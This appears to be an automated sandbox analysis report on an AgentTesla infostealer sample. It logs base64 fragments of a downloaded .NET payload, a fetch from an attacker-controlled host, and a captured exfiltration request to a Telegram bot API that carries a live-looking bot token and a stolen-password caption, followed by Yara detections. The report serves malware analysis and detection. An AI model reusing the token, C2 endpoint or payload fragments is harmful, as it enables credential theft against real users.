                                2022-08-08 10:54:13 UTC219INData Raw: 41 4d 41 52 67 4e 6c 43 32 55 51 4a 51 41 41 41 41 41 41 41 77 41 47 47 43 49 6c 38 51 49 6c 41 41 41 41 41 41 41 44 41 45 59 44 59 41 74 59 45 43 55 41 41 41 41 41 41 41 4d 41 52 67 4e 57 43 37 73 50 4a 51 41 41 41 41 41 41 41 77 42 47 41 32 55 4c 5a 52 41 6c 41 41 41 41 41 41 41 44 41 41 59 59 49 69 58 78 41 69 55 41 41 41 41 41 41 41 4d 41 52 67 4e 67 43 32 77 51 4a 51 41 41 41 41 41 41 41 77 42 47 41 31 59 4c 65 52 41 6c 41 41 41 41 41 41 41 44 41 45 59 44 5a 51 73 6d 45 43 55 41 59 35 6f 41 41 41 41 41 45 52 67 6f 4a 59 59 41 4a 51 43 30 49 67 41 41 41 41 41 47 47 43 49 6c 45 77 41 6c 41 49 43 61 41 41 41 41 41 42 4d 41 6c 77 47 51 45 43 55 41 52 4a 73 41 41 41 41 41 45 51 44 33 42 6f 59 41 4a 51 44 73 6e 67 41 41 41 41 41 52 41 4d 51 42 6b 42 41 6c
                                Data Ascii: AMARgNlC2UQJQAAAAAAAwAGGCIl8QIlAAAAAAADAEYDYAtYECUAAAAAAAMARgNWC7sPJQAAAAAAAwBGA2ULZRAlAAAAAAADAAYYIiXxAiUAAAAAAAMARgNgC2wQJQAAAAAAAwBGA1YLeRAlAAAAAAADAEYDZQsmECUAY5oAAAAAERgoJYYAJQC0IgAAAAAGGCIlEwAlAICaAAAAABMAlwGQECUARJsAAAAAEQD3BoYAJQDsngAAAAARAMQBkBAl
                                2022-08-08 10:54:13 UTC226INData Raw: 6e 30 41 6d 76 38 42 41 41 41 41 6c 67 42 61 49 65 59 43 66 51 43 32 2f 77 45 41 41 41 43 57 41 50 55 45 35 67 4a 39 41 4e 48 2f 41 51 41 41 41 4a 59 41 65 69 58 6d 41 6e 30 41 37 66 38 42 41 41 41 41 6c 67 41 6d 42 65 59 43 66 51 41 49 41 41 49 41 41 41 43 57 41 4c 55 72 35 67 4a 39 41 43 4d 41 41 67 41 41 41 4a 59 41 55 41 58 6d 41 6e 30 41 50 67 41 43 41 41 41 41 6c 67 43 37 4d 4f 59 43 66 51 42 5a 41 41 49 41 41 41 43 57 41 48 6f 46 35 67 4a 39 41 48 51 41 41 67 41 41 41 4a 59 41 35 54 44 6d 41 6e 30 41 6a 77 41 43 41 41 41 41 6c 67 43 79 42 65 59 43 66 51 43 71 41 41 49 41 41 41 43 57 41 41 38 78 35 67 4a 39 41 4d 55 41 41 67 41 41 41 4a 59 41 37 51 58 6d 41 6e 30 41 34 41 41 43 41 41 41 41 6c 67 42 31 4d 65 59 43 66 51 44 38 41 41 49 41 41 41 43 57
                                Data Ascii: n0Amv8BAAAAlgBaIeYCfQC2/wEAAACWAPUE5gJ9ANH/AQAAAJYAeiXmAn0A7f8BAAAAlgAmBeYCfQAIAAIAAACWALUr5gJ9ACMAAgAAAJYAUAXmAn0APgACAAAAlgC7MOYCfQBZAAIAAACWAHoF5gJ9AHQAAgAAAJYA5TDmAn0AjwACAAAAlgCyBeYCfQCqAAIAAACWAA8x5gJ9AMUAAgAAAJYA7QXmAn0A4AACAAAAlgB1MeYCfQD8AAIAAACW
                                2022-08-08 10:54:13 UTC234INData Raw: 4a 59 41 47 6a 48 6d 41 6e 30 41 70 7a 55 43 41 41 41 41 6c 67 44 34 42 65 59 43 66 51 44 49 4e 51 49 41 41 41 43 57 41 4f 34 78 35 67 4a 39 41 4f 6b 31 41 67 41 41 41 4a 59 41 49 67 62 6d 41 6e 30 41 43 6a 59 43 41 41 41 41 6c 67 41 32 4d 75 59 43 66 51 41 72 4e 67 49 41 41 41 43 57 41 45 77 47 35 67 4a 39 41 45 30 32 41 67 41 41 41 4a 59 41 30 6a 54 6d 41 6e 30 41 62 6a 59 43 41 41 41 41 6c 67 42 33 41 65 59 43 66 51 43 51 4e 67 49 41 41 41 43 57 41 4b 59 47 35 67 4a 39 41 4c 49 32 41 67 41 41 41 4a 59 41 75 67 48 6d 41 6e 30 41 31 44 59 43 41 41 41 41 6c 67 41 61 42 2b 59 43 66 51 44 32 4e 67 49 41 41 41 43 57 41 4f 77 42 35 67 4a 39 41 42 67 33 41 67 41 41 41 4a 59 41 55 41 66 6d 41 6e 30 41 4f 6a 63 43 41 41 41 41 6c 67 42 65 41 75 59 43 66 51 42 63
                                Data Ascii: JYAGjHmAn0ApzUCAAAAlgD4BeYCfQDINQIAAACWAO4x5gJ9AOk1AgAAAJYAIgbmAn0ACjYCAAAAlgA2MuYCfQArNgIAAACWAEwG5gJ9AE02AgAAAJYA0jTmAn0AbjYCAAAAlgB3AeYCfQCQNgIAAACWAKYG5gJ9ALI2AgAAAJYAugHmAn0A1DYCAAAAlgAaB+YCfQD2NgIAAACWAOwB5gJ9ABg3AgAAAJYAUAfmAn0AOjcCAAAAlgBeAuYCfQBc
                                2022-08-08 10:54:13 UTC242INData Raw: 44 6b 43 31 78 63 74 42 4a 45 42 71 51 73 79 42 45 45 43 69 51 6b 33 42 47 45 42 65 52 55 39 42 4d 6b 41 68 53 70 59 42 4d 6b 41 61 41 31 4a 41 63 6b 41 78 51 63 75 41 63 6b 41 71 41 31 64 42 45 6b 43 52 51 4a 77 42 46 6b 43 4d 67 6c 77 42 46 45 43 43 54 52 32 42 45 6b 43 79 53 6d 41 42 47 45 43 7a 53 32 56 42 47 6b 43 57 6a 4b 78 42 4a 45 42 45 52 57 32 42 47 6b 43 49 69 57 38 42 4b 6b 41 45 67 72 43 42 48 45 43 4f 7a 48 49 42 48 45 43 65 52 58 4f 42 4b 6b 41 7a 43 76 54 42 4b 6b 41 7a 43 76 5a 42 4b 6b 42 5a 42 41 54 41 43 6b 41 4f 52 73 6b 42 62 6b 43 73 79 55 71 42 61 6b 43 5a 68 59 75 41 61 6b 43 6f 43 30 75 41 61 45 43 49 69 55 77 42 5a 6b 43 49 69 55 77 42 5a 45 43 49 69 57 59 41 34 45 43 41 54 51 32 42 56 6b 43 6c 52 51 37 42 59 6b 43 49 69 56 42
                                Data Ascii: DkC1xctBJEBqQsyBEECiQk3BGEBeRU9BMkAhSpYBMkAaA1JAckAxQcuAckAqA1dBEkCRQJwBFkCMglwBFECCTR2BEkCySmABGECzS2VBGkCWjKxBJEBERW2BGkCIiW8BKkAEgrCBHECOzHIBHECeRXOBKkAzCvTBKkAzCvZBKkBZBATACkAORskBbkCsyUqBakCZhYuAakCoC0uAaECIiUwBZkCIiUwBZECIiWYA4ECATQ2BVkClRQ7BYkCIiVB
                                2022-08-08 10:54:13 UTC250INData Raw: 37 59 65 41 41 41 43 43 37 49 65 41 41 42 62 44 48 6f 65 41 41 41 77 44 57 77 50 41 41 41 4b 44 33 59 65 41 41 41 53 4b 6d 77 50 41 41 42 39 42 6f 41 65 41 41 41 53 48 59 51 65 41 41 44 5a 48 49 41 65 41 41 44 62 4b 6d 77 50 41 41 44 59 4b 6d 77 50 41 41 44 51 4c 32 77 50 41 41 43 59 49 32 77 50 41 41 43 63 44 57 77 50 41 41 44 33 44 57 77 50 41 41 44 75 43 57 77 50 41 41 42 44 4c 62 49 65 41 41 43 47 43 4c 49 65 41 41 41 30 4e 48 59 65 41 41 44 47 46 62 49 65 41 41 41 74 48 72 49 65 41 41 43 67 44 33 59 65 41 41 43 74 49 64 38 65 41 41 41 71 48 47 77 50 41 41 42 34 44 75 51 65 41 41 44 74 44 47 77 50 41 41 42 46 48 32 77 50 41 41 44 62 4d 6e 6f 65 41 41 44 50 43 4f 51 65 41 41 42 64 43 4f 51 65 41 41 44 34 45 39 73 66 41 41 41 6f 43 62 49 65 41 41 43 55
                                Data Ascii: 7YeAAACC7IeAABbDHoeAAAwDWwPAAAKD3YeAAASKmwPAAB9BoAeAAASHYQeAADZHIAeAADbKmwPAADYKmwPAADQL2wPAACYI2wPAACcDWwPAAD3DWwPAADuCWwPAABDLbIeAACGCLIeAAA0NHYeAADGFbIeAAAtHrIeAACgD3YeAACtId8eAAAqHGwPAAB4DuQeAADtDGwPAABFH2wPAADbMnoeAADPCOQeAABdCOQeAAD4E9sfAAAoCbIeAACU
                                2022-08-08 10:54:13 UTC258INData Raw: 58 42 6c 41 48 4e 6c 64 46 39 4e 5a 57 52 70 59 56 52 35 63 47 55 41 51 32 68 68 62 6d 64 6c 56 48 6c 77 5a 51 42 57 59 57 78 31 5a 56 52 35 63 47 55 41 55 33 52 79 61 57 35 6e 56 48 6c 77 5a 51 42 54 5a 57 4e 31 63 6d 6c 30 65 56 42 79 62 33 52 76 59 32 39 73 56 48 6c 77 5a 51 42 43 61 57 35 6b 56 47 39 55 65 58 42 6c 41 47 64 6c 64 46 39 68 64 6d 46 30 59 58 4a 55 65 58 42 6c 41 48 4e 6c 64 46 39 68 64 6d 46 30 59 58 4a 55 65 58 42 6c 41 45 64 6c 64 46 52 35 63 47 55 41 55 32 39 6a 61 32 56 30 56 48 6c 77 5a 51 42 7a 5a 58 52 66 51 32 39 75 64 47 56 75 64 46 52 35 63 47 55 41 52 6d 6c 73 5a 56 4e 6f 59 58 4a 6c 41 45 4e 76 62 58 42 68 63 6d 55 41 55 48 52 79 56 47 39 54 64 48 4a 31 59 33 52 31 63 6d 55 41 5a 32 56 30 58 30 6c 75 64 6d 46 79 61 57 46 75
                                Data Ascii: XBlAHNldF9NZWRpYVR5cGUAQ2hhbmdlVHlwZQBWYWx1ZVR5cGUAU3RyaW5nVHlwZQBTZWN1cml0eVByb3RvY29sVHlwZQBCaW5kVG9UeXBlAGdldF9hdmF0YXJUeXBlAHNldF9hdmF0YXJUeXBlAEdldFR5cGUAU29ja2V0VHlwZQBzZXRfQ29udGVudFR5cGUARmlsZVNoYXJlAENvbXBhcmUAUHRyVG9TdHJ1Y3R1cmUAZ2V0X0ludmFyaWFu
                                2022-08-08 10:54:13 UTC265INData Raw: 57 78 43 59 58 4e 70 59 79 35 4e 65 56 4e 6c 63 6e 5a 70 59 32 56 7a 41 45 64 6c 64 45 6c 75 63 33 52 68 62 6d 4e 6c 63 77 42 6e 5a 58 52 66 51 32 68 70 62 47 52 4f 62 32 52 6c 63 77 42 4e 59 58 52 6a 61 47 56 7a 41 45 64 6c 64 45 52 70 63 6d 56 6a 64 47 39 79 61 57 56 7a 41 47 64 6c 64 46 39 51 63 6d 39 77 5a 58 4a 30 61 57 56 7a 41 45 56 34 63 47 46 75 5a 45 56 75 64 6d 6c 79 62 32 35 74 5a 57 35 30 56 6d 46 79 61 57 46 69 62 47 56 7a 41 45 64 6c 64 45 5a 70 62 47 56 7a 41 45 56 75 64 57 31 51 63 6d 39 6a 5a 58 4e 7a 54 57 39 6b 64 57 78 6c 63 77 42 48 5a 58 52 4e 62 32 52 31 62 47 56 7a 41 45 35 31 62 57 4a 6c 63 6c 4e 30 65 57 78 6c 63 77 42 48 5a 58 52 54 64 57 4a 4c 5a 58 6c 4f 59 57 31 6c 63 77 42 53 5a 57 46 6b 51 57 78 73 54 47 6c 75 5a 58 4d 41
                                Data Ascii: WxCYXNpYy5NeVNlcnZpY2VzAEdldEluc3RhbmNlcwBnZXRfQ2hpbGROb2RlcwBNYXRjaGVzAEdldERpcmVjdG9yaWVzAGdldF9Qcm9wZXJ0aWVzAEV4cGFuZEVudmlyb25tZW50VmFyaWFibGVzAEdldEZpbGVzAEVudW1Qcm9jZXNzTW9kdWxlcwBHZXRNb2R1bGVzAE51bWJlclN0eWxlcwBHZXRTdWJLZXlOYW1lcwBSZWFkQWxsTGluZXMA
                                2022-08-08 10:54:13 UTC273INData Raw: 77 67 59 45 6f 47 64 43 41 51 41 41 51 67 59 42 51 41 42 41 68 30 46 42 51 41 43 43 51 6b 4a 43 51 41 45 41 68 67 64 43 51 6b 51 43 51 49 71 43 41 45 49 43 51 41 45 43 52 67 59 45 6f 47 64 43 41 59 41 41 67 67 59 45 41 67 45 41 41 45 49 43 41 30 41 42 77 67 4a 43 52 30 46 45 6f 47 64 43 41 6b 59 41 52 55 52 42 77 6f 4f 43 52 4a 70 48 51 6b 53 5a 51 6b 49 43 42 4b 42 6e 51 67 46 41 41 45 53 5a 51 67 46 41 41 45 49 45 6a 55 44 49 41 41 59 42 41 41 42 47 41 6f 49 42 77 55 4f 44 67 34 4f 45 6d 6b 47 41 41 45 53 67 66 55 4f 43 41 63 45 45 6f 47 64 44 67 67 49 43 41 63 44 45 59 45 35 48 51 34 49 41 77 41 41 41 67 63 48 42 51 34 43 43 41 67 49 42 51 63 43 44 68 4a 70 42 43 41 42 44 67 67 46 49 41 41 53 67 66 6b 47 41 41 45 42 45 59 48 39 44 77 63 4a 44 67 67 64
                                Data Ascii: wgYEoGdCAQAAQgYBQABAh0FBQACCQkJCQAEAhgdCQkQCQIqCAEICQAECRgYEoGdCAYAAggYEAgEAAEICA0ABwgJCR0FEoGdCAkYARURBwoOCRJpHQkSZQkICBKBnQgFAAESZQgFAAEIEjUDIAAYBAABGAoIBwUODg4OEmkGAAESgfUOCAcEEoGdDggICAcDEYE5HQ4IAwAAAgcHBQ4CCAgIBQcCDhJpBCABDggFIAASgfkGAAEBEYH9DwcJDggd
                                2022-08-08 10:54:13 UTC281INData Raw: 51 63 4b 41 67 6f 49 43 42 77 64 42 51 67 49 43 41 67 46 49 41 49 4b 43 41 67 45 49 41 45 43 43 67 63 48 42 51 73 4c 43 41 67 49 42 53 41 43 43 77 67 49 46 51 63 51 43 77 63 49 48 51 6f 49 43 68 77 4b 48 41 67 48 45 59 4f 42 43 41 67 49 43 41 51 41 41 51 73 63 42 43 41 42 41 51 73 4c 41 41 49 52 67 34 45 52 67 34 45 52 67 34 45 47 41 41 45 49 45 59 4f 42 43 51 41 43 43 42 47 44 67 52 47 44 67 51 51 47 45 59 4f 42 42 67 41 42 43 78 47 44 67 51 59 41 41 51 63 52 67 34 45 4c 41 41 49 53 67 67 55 53 67 67 55 53 67 67 55 45 48 52 47 41 72 42 6b 48 46 41 49 4c 48 41 67 49 48 52 47 41 70 41 67 63 43 68 77 4b 43 68 77 49 42 77 63 49 43 41 67 49 42 42 30 52 67 4b 67 45 48 52 47 41 70 41 51 41 41 51 34 4c 42 43 41 42 41 67 73 55 42 77 30 64 48 41 67 43 43 41 67 63
                                Data Ascii: QcKAgoICBwdBQgICAgFIAIKCAgEIAECCgcHBQsLCAgIBSACCwgIFQcQCwcIHQoIChwKHAgHEYOBCAgICAQAAQscBCABAQsLAAIRg4ERg4ERg4EGAAEIEYOBCQACCBGDgRGDgQQGEYOBBgABCxGDgQYAAQcRg4ELAAISggUSggUSggUEHRGArBkHFAILHAgIHRGApAgcChwKChwIBwcICAgIBB0RgKgEHRGApAQAAQ4LBCABAgsUBw0dHAgCCAgc


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.449756162.240.35.239443C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                                TimestampkBytes transferredDirectionData
                                2022-08-08 10:54:14 UTC288OUTGET /devv/DLLL.txt HTTP/1.1
                                Host: sebastiank.tk
                                2022-08-08 10:54:14 UTC289INHTTP/1.1 200 OK
                                Date: Mon, 08 Aug 2022 10:54:13 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Mon, 08 Aug 2022 06:49:17 GMT
                                Accept-Ranges: bytes
                                Content-Length: 20480
                                Content-Type: text/plain
                                2022-08-08 10:54:14 UTC289INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 43 78 38 47 49 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 44 51 41 41 41 41 34 41 41 41 41 41 41 41 41 30 6c 4d 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABCx8GIAAAAAAAAAAOAADiELATAAADQAAAA4AAAAAAAA0lMAAAAgAAAAYAAAAABAAAAgAAAAAgA
                                2022-08-08 10:54:14 UTC297INData Raw: 41 41 4d 41 44 34 4a 77 41 41 41 41 43 54 41 4d 77 4f 68 51 41 78 41 42 51 6f 41 41 41 41 41 4a 4d 41 37 67 36 4b 41 44 49 41 33 43 67 41 41 41 41 41 6b 52 67 39 44 6d 34 41 4e 41 42 49 4b 51 41 41 41 41 43 47 47 41 4d 4c 63 67 41 30 41 46 77 70 41 41 41 41 41 4a 4d 41 4d 67 2b 52 41 44 51 41 55 43 6f 41 41 41 41 41 6b 52 67 39 44 6d 34 41 4e 51 43 6f 4b 67 41 41 41 41 43 47 47 41 4d 4c 63 67 41 31 41 4c 77 71 41 41 41 41 41 4a 45 41 2f 67 2b 67 41 44 55 41 41 43 73 41 41 41 41 41 6b 51 42 43 45 4b 59 41 4e 67 44 55 4b 77 41 41 41 41 43 54 41 47 51 51 72 51 41 33 41 42 51 73 41 41 41 41 41 4a 4d 41 71 42 43 30 41 44 67 41 54 43 77 41 41 41 41 41 6b 77 44 4b 45 4c 77 41 4f 67 43 49 4c 77 41 41 41 41 43 52 41 44 41 52 62 67 41 38 41 49 77 76 41 41 41 41 41
                                Data Ascii: AAMAD4JwAAAACTAMwOhQAxABQoAAAAAJMA7g6KADIA3CgAAAAAkRg9Dm4ANABIKQAAAACGGAMLcgA0AFwpAAAAAJMAMg+RADQAUCoAAAAAkRg9Dm4ANQCoKgAAAACGGAMLcgA1ALwqAAAAAJEA/g+gADUAACsAAAAAkQBCEKYANgDUKwAAAACTAGQQrQA3ABQsAAAAAJMAqBC0ADgATCwAAAAAkwDKELwAOgCILwAAAACRADARbgA8AIwvAAAAA
                                2022-08-08 10:54:14 UTC304INData Raw: 46 6b 55 48 4a 76 59 32 56 7a 63 30 31 6c 62 57 39 79 65 51 42 58 63 6d 6c 30 5a 56 42 79 62 32 4e 6c 63 33 4e 4e 5a 57 31 76 63 6e 6b 41 56 57 35 74 59 58 42 57 61 57 56 33 54 32 5a 54 5a 57 4e 30 61 57 39 75 41 46 5a 70 63 6e 52 31 59 57 78 42 62 47 78 76 59 30 56 34 41 46 4a 6c 63 33 56 74 5a 56 52 6f 63 6d 56 68 5a 41 42 47 62 33 4a 74 59 58 51 41 52 32 56 30 56 48 6c 77 5a 55 5a 79 62 32 31 49 59 57 35 6b 62 47 55 41 55 32 6c 36 5a 55 39 6d 41 46 52 76 56 55 6c 75 64 44 4d 79 41 45 6c 7a 54 6e 56 73 62 45 39 79 52 57 31 77 64 48 6b 41 51 32 39 75 59 32 46 30 41 46 70 6c 63 6d 38 41 56 47 39 4a 62 6e 51 7a 4d 67 42 6e 5a 58 52 66 55 32 6c 36 5a 51 42 55 62 30 6c 75 64 44 45 32 41 45 4a 73 62 32 4e 72 51 32 39 77 65 51 42 48 5a 58 52 43 65 58 52 6c 63
                                Data Ascii: FkUHJvY2Vzc01lbW9yeQBXcml0ZVByb2Nlc3NNZW1vcnkAVW5tYXBWaWV3T2ZTZWN0aW9uAFZpcnR1YWxBbGxvY0V4AFJlc3VtZVRocmVhZABGb3JtYXQAR2V0VHlwZUZyb21IYW5kbGUAU2l6ZU9mAFRvVUludDMyAElzTnVsbE9yRW1wdHkAQ29uY2F0AFplcm8AVG9JbnQzMgBnZXRfU2l6ZQBUb0ludDE2AEJsb2NrQ29weQBHZXRCeXRlc


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.449855149.154.167.220443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                TimestampkBytes transferredDirectionData
                                2022-08-08 10:56:04 UTC309OUTPOST /bot5083863399:AAH9g72QTdN88jNOd6_tBrE8gEd-FpXnfHE/sendDocument HTTP/1.1
                                Content-Type: multipart/form-data; boundary=---------------------------8da79575956deb2
                                Host: api.telegram.org
                                Content-Length: 1001
                                Expect: 100-continue
                                Connection: Keep-Alive
                                2022-08-08 10:56:04 UTC309INHTTP/1.1 100 Continue
                                2022-08-08 10:56:04 UTC309OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 35 37 35 39 35 36 64 65 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 34 31 30 38 39 37 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 37 39 35 37 35 39 35 36 64 65 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 6a 6f 6e 65 73 2f 39 33 36 39 30 35 0a 4f 53 46 75 6c 6c
                                Data Ascii: -----------------------------8da79575956deb2Content-Disposition: form-data; name="chat_id"5041089746-----------------------------8da79575956deb2Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/936905OSFull
                                2022-08-08 10:56:04 UTC310INHTTP/1.1 200 OK
                                Server: nginx/1.18.0
                                Date: Mon, 08 Aug 2022 10:56:04 GMT
                                Content-Type: application/json
                                Content-Length: 628
                                Connection: close
                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                {"ok":true,"result":{"message_id":257686,"from":{"id":5083863399,"is_bot":true,"first_name":"kay","username":"kaywins_bot"},"chat":{"id":5041089746,"first_name":"Popo","last_name":"Popo","username":"popo2024","type":"private"},"date":1659956164,"document":{"file_name":"user-936905 2022-08-08 04-01-14.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAED7pZi8OvEfd09A4hIrHojV1M0GDk-VgACjAIAAhJNgEfNmzcRlb3_gikE","file_unique_id":"AgADjAIAAhJNgEc","file_size":431},"caption":"New PW Recovered!\n\nUser Name: user/936905\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                Click to jump to process

                                Target ID:0
                                Start time:12:54:09
                                Start date:08/08/2022
                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.447.21602.exe"
                                Imagebase:0x200000
                                File size:246304 bytes
                                MD5 hash:36C6DDDAA5FB7F14E221C8FA3BDA0D92
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_AgentTesla_f2a90d14, Description: unknown, Source: 00000000.00000002.245594271.0000000003D89000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Reputation:low

                                Target ID:3
                                Start time:12:54:14
                                Start date:08/08/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                Imagebase:0xd00000
                                File size:43176 bytes
                                MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_AgentTesla_f2a90d14, Description: unknown, Source: 00000003.00000000.243097169.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_AgentTesla_f2a90d14, Description: unknown, Source: 00000003.00000000.242851689.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_AgentTesla_f2a90d14, Description: unknown, Source: 00000003.00000002.498729589.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_AgentTesla_f2a90d14, Description: unknown, Source: 00000003.00000000.243362450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: Windows_Trojan_AgentTesla_f2a90d14, Description: unknown, Source: 00000003.00000000.242587735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000003.00000002.501623569.00000000069B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
